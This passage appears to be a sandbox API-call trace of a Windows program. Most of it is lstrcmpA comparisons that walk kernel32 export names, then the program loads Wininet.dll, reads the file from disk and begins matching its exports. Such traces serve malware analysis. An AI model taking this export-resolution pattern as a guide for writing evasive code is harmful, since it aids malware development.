lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0148.216] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.217] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0148.217] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0148.217] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0148.218] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0148.218] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0148.218] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0148.218] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0148.219] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.219] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0148.220] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0148.220] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0148.220] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0148.220] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0148.220] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0148.221] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0148.221] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0148.221] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0148.222] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0148.222] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0148.223] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0148.224] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0149.276] GetProcessHeap () returned 0x4d0000 [0149.276] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc5c0 | out: hHeap=0x4d0000) returned 1 [0149.277] GetProcessHeap () returned 0x4d0000 [0149.277] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9110 [0149.277] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0149.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0149.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0149.404] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0149.404] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0149.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0149.404] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0149.404] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0149.404] GetProcessHeap () returned 0x4d0000 [0149.404] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x286600) returned 0x4002040 [0149.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0149.410] ReadFile (in: hFile=0x140, lpBuffer=0x4002040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4002040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0149.877] CloseHandle (hObject=0x140) returned 1 [0149.877] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0149.877] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0149.877] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0149.877] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0149.878] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0149.878] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0149.878] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0149.878] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 